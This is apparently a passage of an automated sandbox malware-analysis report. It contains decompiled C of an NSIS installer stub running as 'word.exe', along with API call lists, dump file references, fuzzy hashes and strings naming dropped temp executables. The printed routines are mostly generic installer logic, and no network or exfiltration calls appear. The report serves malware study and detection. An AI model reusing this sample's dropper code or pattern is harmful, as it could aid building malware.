								 *((intOrPtr*)(_t111 + 0x3c)) =  *0x420ef4;
								E00406113(0x42a280, _t111 + 4, 0x40);
								return 0;
							}
							goto L32;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004035F8( *0x420ef0);
					if(E004035E2( &_a4, 4) == 0 || _v8 != _a4) {
						goto L32;
					} else {
						goto L28;
					}
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						if(E004035E2(0x418ef0, _t107) == 0) {
							E0040302E(1);
							L32:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42a274 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E0040302E(0);
							}
							goto L20;
						}
						E00406113( &_v40, 0x418ef0, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x42a274 =  *0x420ef0;
							if(_t92 > _t110) {
								goto L32;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t110 = _t92 - 4;
								if(_t107 > _t110) {
									_t107 = _t110;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t110 <  *0x420f00) {
							_v8 = E00406B22(_v8, 0x418ef0, _t107);
						}
						 *0x420ef0 =  *0x420ef0 + _t107;
						_t110 = _t110 - _t107;
					} while (_t110 != 0);
					_t94 = 0;
					goto L24;
				}
			}




























                                    0x004030db
                                    0x004030de
                                    0x004030e1
                                    0x004030fb
                                    0x00403100
                                    0x00403113
                                    0x00403118
                                    0x0040311e
                                    0x00000000
                                    0x00403120
                                    0x00403131
                                    0x00403142
                                    0x00403149
                                    0x00403151
                                    0x00403156
                                    0x00403158
                                    0x00403243
                                    0x00403245
                                    0x00403251
                                    0x00000000
                                    0x00000000
                                    0x0040325a
                                    0x00403286
                                    0x0040328b
                                    0x00403296
                                    0x00403298
                                    0x004032a9
                                    0x004032c4
                                    0x004032cd
                                    0x004032d2
                                    0x004032f1
                                    0x00403301
                                    0x00403313
                                    0x00403318
                                    0x00403320
                                    0x0040332d
                                    0x00403335
                                    0x0040333a
                                    0x0040333c
                                    0x0040333c
                                    0x00403344
                                    0x00403344
                                    0x00403347
                                    0x00403348
                                    0x00403348
                                    0x0040334b
                                    0x0040334d
                                    0x0040334d
                                    0x00403357
                                    0x00403363
                                    0x00000000
                                    0x00403368
                                    0x00000000
                                    0x00403320
                                    0x00000000
                                    0x004032d4
                                    0x00403262
                                    0x00403274
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040315e
                                    0x00403163
                                    0x00403168
                                    0x0040316c
                                    0x00403173
                                    0x0040317a
                                    0x0040317c
                                    0x0040317c
                                    0x00403187
                                    0x004032e0
                                    0x00403322
                                    0x00000000
                                    0x00403322
                                    0x00403194
                                    0x00403214
                                    0x00403218
                                    0x0040321d
                                    0x00000000
                                    0x00403214
                                    0x0040319d
                                    0x004031a2
                                    0x004031aa
                                    0x004031d0
                                    0x004031df
                                    0x004031e5
                                    0x004031ea
                                    0x004031f0
                                    0x00000000
                                    0x00000000
                                    0x004031fa
                                    0x00403202
                                    0x00403205
                                    0x0040320a
                                    0x0040320c
                                    0x0040320c
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x004031fa
                                    0x0040321e
                                    0x00403224
                                    0x00403230
                                    0x00403230
                                    0x00403233
                                    0x00403239
                                    0x00403239
                                    0x00403241
                                    0x00000000
                                    0x00403241

                                    APIs
                                    • GetTickCount.KERNEL32(7556D4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004030E4
                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\word.exe,00000400), ref: 00403100
                                      • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 0040615C
                                      • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                    • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\AppData\Roaming\word.exe,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 00403149
                                    • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\word.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                    • API String ID: 2803837635-565166287
                                    • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                    • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                                    • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                    • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040176F Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 145stringtimeCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 459 40176f-401794 call 402da6 call 405fae 464 401796-40179c call 406668 459->464 465 40179e-4017b0 call 406668 call 405f37 lstrcatW 459->465 470 4017b5-4017b6 call 4068ef 464->470 465->470 474 4017bb-4017bf 470->474 475 4017c1-4017cb call 40699e 474->475 476 4017f2-4017f5 474->476 483 4017dd-4017ef 475->483 484 4017cd-4017db CompareFileTime 475->484 477 4017f7-4017f8 call 406133 476->477 478 4017fd-401819 call 406158 476->478 477->478 486 40181b-40181e 478->486 487 40188d-4018b6 call 4056ca call 403371 478->487 483->476 484->483 488 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 486->488 489 40186f-401879 call 4056ca 486->489 499 4018b8-4018bc 487->499 500 4018be-4018ca SetFileTime 487->500 488->474 521 401864-401865 488->521 501 401882-401888 489->501 499->500 503 4018d0-4018db CloseHandle 499->503 500->503 504 402c33 501->504 506 4018e1-4018e4 503->506 507 402c2a-402c2d 503->507 508 402c35-402c39 504->508 511 4018e6-4018f7 call 4066a5 lstrcatW 506->511 512 4018f9-4018fc call 4066a5 506->512 507->504 518 401901-4023a2 call 405cc8 511->518 512->518 518->507 518->508 521->501 523 401867-401868 521->523 523->489
                                    C-Code - Quality: 77%
                                    			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405FAE( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"\"C:\\";
				if(_t35 == 0) {
					lstrcatW(E00405F37(E00406668(_t81, 0x436000)), ??);
				} else {
					E00406668();
				}
				E004068EF(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040699E(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406133(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004056CA(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2e8;
						goto L32;
					} else {
						E00406668(0x40b5f8, _t83);
						E00406668(_t83, _t81);
						E004066A5(_t77, _t81, _t83, "C:\Users\Albus\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
						E00406668(_t83, 0x40b5f8);
						_t64 = E00405CC8("C:\Users\Albus\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004056CA();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004056CA(0xffffffea,  *(_t86 - 8));
				 *0x42a314 =  *0x42a314 + 1;
				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x42a314 =  *0x42a314 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405CC8();
					goto L29;
				}
				goto L33;
			}


















                                    0x0040176f
                                    0x00401776
                                    0x00401782
                                    0x00401785
                                    0x0040178a
                                    0x0040178d
                                    0x00401794
                                    0x004017b0
                                    0x00401796
                                    0x00401797
                                    0x00401797
                                    0x004017b6
                                    0x004017bb
                                    0x004017bb
                                    0x004017bf
                                    0x004017c2
                                    0x004017c7
                                    0x004017c9
                                    0x004017cb
                                    0x004017d0
                                    0x004017d0
                                    0x004017db
                                    0x004017db
                                    0x004017ec
                                    0x004017ee
                                    0x004017ee
                                    0x004017ef
                                    0x004017ef
                                    0x004017f2
                                    0x004017f5
                                    0x004017f8
                                    0x004017f8
                                    0x004017ff
                                    0x0040180e
                                    0x00401813
                                    0x00401816
                                    0x00401819
                                    0x00000000
                                    0x00000000
                                    0x0040181b
                                    0x0040181e
                                    0x00401874
                                    0x00401879
                                    0x004015b6
                                    0x0040292e
                                    0x0040292e
                                    0x00402c2a
                                    0x00402c2d
                                    0x00402c2d
                                    0x00000000
                                    0x00401820
                                    0x00401826
                                    0x0040182d
                                    0x0040183a
                                    0x00401845
                                    0x0040185b
                                    0x0040185b
                                    0x0040185e
                                    0x00000000
                                    0x00401864
                                    0x00401864
                                    0x00401865
                                    0x00401882
                                    0x00402c33
                                    0x00402c33
                                    0x00402c33
                                    0x00401867
                                    0x00401867
                                    0x00401868
                                    0x00401493
                                    0x0040239d
                                    0x0040239d
                                    0x0040239d
                                    0x00401865
                                    0x0040185e
                                    0x00402c35
                                    0x00402c39
                                    0x00402c39
                                    0x00401892
                                    0x00401897
                                    0x004018a5
                                    0x004018aa
                                    0x004018b0
                                    0x004018b4
                                    0x004018b6
                                    0x004018be
                                    0x004018ca
                                    0x004018b8
                                    0x004018b8
                                    0x004018bc
                                    0x00000000
                                    0x00000000
                                    0x004018bc
                                    0x004018d3
                                    0x004018d9
                                    0x004018db
                                    0x00000000
                                    0x004018e1
                                    0x004018e1
                                    0x004018e4
                                    0x004018fc
                                    0x004018e6
                                    0x004018e9
                                    0x004018f2
                                    0x004018f2
                                    0x00401901
                                    0x00401906
                                    0x00402398
                                    0x00000000
                                    0x00402398
                                    0x00000000

                                    APIs
                                    • lstrcatW.KERNEL32 ref: 004017B0
                                    • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\lyebkz.exe" C:\Users\user\AppData\Local\Temp\ektmwwvwm.tx,"C:\Users\user\AppData\Local\Temp\lyebkz.exe" C:\Users\user\AppData\Local\Temp\ektmwwvwm.tx,00000000,00000000,"C:\Users\user\AppData\Local\Temp\lyebkz.exe" C:\Users\user\AppData\Local\Temp\ektmwwvwm.tx,00436000,?,?,00000031), ref: 004017D5
                                      • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                      • Part of subcall function 004056CA: lstrcatW.KERNEL32 ref: 00405725
                                      • Part of subcall function 004056CA: SetWindowTextW.USER32 ref: 00405737
                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                    • String ID: "C:\Users\user\AppData\Local\Temp\lyebkz.exe" C:\Users\user\AppData\Local\Temp\ektmwwvwm.tx$C:\Users\user\AppData\Local\Temp
                                    • API String ID: 1941528284-2139043921
                                    • Opcode ID: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                    • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                                    • Opcode Fuzzy Hash: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                    • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004069C5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 525 4069c5-4069e5 GetSystemDirectoryW 526 4069e7 525->526 527 4069e9-4069eb 525->527 526->527 528 4069fc-4069fe 527->528 529 4069ed-4069f6 527->529 531 4069ff-406a32 wsprintfW LoadLibraryExW 528->531 529->528 530 4069f8-4069fa 529->530 530->531
                                    C-Code - Quality: 100%
                                    			E004069C5(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                                    0x004069dc
                                    0x004069e5
                                    0x004069e7
                                    0x004069e7
                                    0x004069eb
                                    0x004069fe
                                    0x004069f8
                                    0x004069f8
                                    0x004069f8
                                    0x00406a17
                                    0x00406a2b
                                    0x00406a32

                                    APIs
                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                    • wsprintfW.USER32 ref: 00406A17
                                    • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                    • String ID: %s%S.dll$UXTHEME$\
                                    • API String ID: 2200240437-1946221925
                                    • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                    • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                                    • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                    • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00403479 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 101COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 532 403479-4034a1 GetTickCount 533 4035d1-4035d9 call 40302e 532->533 534 4034a7-4034d2 call 4035f8 SetFilePointer 532->534 539 4035db-4035df 533->539 540 4034d7-4034e9 534->540 541 4034eb 540->541 542 4034ed-4034fb call 4035e2 540->542 541->542 545 403501-40350d 542->545 546 4035c3-4035c6 542->546 547 403513-403519 545->547 546->539 548 403544-403560 call 406bb0 547->548 549 40351b-403521 547->549 555 403562-40356a 548->555 556 4035cc 548->556 549->548 550 403523-403543 call 40302e 549->550 550->548 558 40356c-403574 call 40620a 555->558 559 40358d-403593 555->559 557 4035ce-4035cf 556->557 557->539 563 403579-40357b 558->563 559->556 560 403595-403597 559->560 560->556 562 403599-4035ac 560->562 562->540 564 4035b2-4035c1 SetFilePointer 562->564 565 4035c8-4035ca 563->565 566 40357d-403589 563->566 564->533 565->557 566->547 567 40358b 566->567 567->562
                                    C-Code - Quality: 93%
                                    			E00403479(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t34 =  *0x420ef4 -  *0x40ce60 + _a4;
				 *0x42a26c = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E0040302E(1);
					return 0;
				}
				E004035F8( *0x420f04);
				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
				 *0x420f00 = _t34;
				 *0x420ef0 = 0;
				while(1) {
					_t31 = 0x4000;
					_t11 =  *0x420ef8 -  *0x420f04;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E004035E2(0x414ef0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x420f04 =  *0x420f04 + _t31;
					 *0x40ce80 = 0x414ef0;
					 *0x40ce84 = _t31;
					L6:
					L6:
					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
						 *0x420ef0 =  *0x420f00 -  *0x420ef4 - _a4 +  *0x40ce60;
						E0040302E(0);
					}
					 *0x40ce88 = 0x40cef0;
					 *0x40ce8c = 0x8000; // executed
					_t14 = E00406BB0(0x40ce68); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40ce88; // 0x40e779
					_t37 = _t36 - 0x40cef0;
					if(_t37 == 0) {
						__eflags =  *0x40ce84; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x420ef4;
						if(_t16 -  *0x40ce60 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0);
						goto L22;
					}
					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce60 =  *0x40ce60 + _t37;
					_t49 =  *0x40ce84; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}














                                    0x00403489
                                    0x0040349c
                                    0x004034a1
                                    0x004035d1
                                    0x004035d3
                                    0x00000000
                                    0x004035d9
                                    0x004034ad
                                    0x004034c0
                                    0x004034c6
                                    0x004034cc
                                    0x004034d7
                                    0x004034dc
                                    0x004034e1
                                    0x004034e9
                                    0x004034eb
                                    0x004034eb
                                    0x004034f4
                                    0x004034fb
                                    0x00000000
                                    0x00000000
                                    0x00403501
                                    0x00403507
                                    0x0040350d
                                    0x00000000
                                    0x00403513
                                    0x00403519
                                    0x00403539
                                    0x0040353e
                                    0x00403543
                                    0x00403549
                                    0x0040354f
                                    0x00403559
                                    0x00403560
                                    0x00000000
                                    0x00000000
                                    0x00403562
                                    0x00403568
                                    0x0040356a
                                    0x0040358d
                                    0x00403593
                                    0x00000000
                                    0x00000000
                                    0x00403595
                                    0x00403597
                                    0x00000000
                                    0x00000000
                                    0x00403599
                                    0x00403599
                                    0x004035ac
                                    0x00000000
                                    0x00000000
                                    0x004035bb
                                    0x00000000
                                    0x004035bb
                                    0x00403574
                                    0x0040357b
                                    0x004035c8
                                    0x004035ce
                                    0x004035ce
                                    0x00000000
                                    0x004035ce
                                    0x0040357d
                                    0x00403583
                                    0x00403589
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x004035cc
                                    0x004035cc
                                    0x00000000
                                    0x004035cc
                                    0x00000000

                                    APIs
                                    • GetTickCount.KERNEL32(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 0040348D
                                      • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                    • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                                    • SetFilePointer.KERNEL32(?,00000000,00000000,248058040134,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: FilePointer$CountTick
                                    • String ID: 248058040134$y@
                                    • API String ID: 1092082344-3798503964
                                    • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                    • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                                    • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                    • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405B99 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
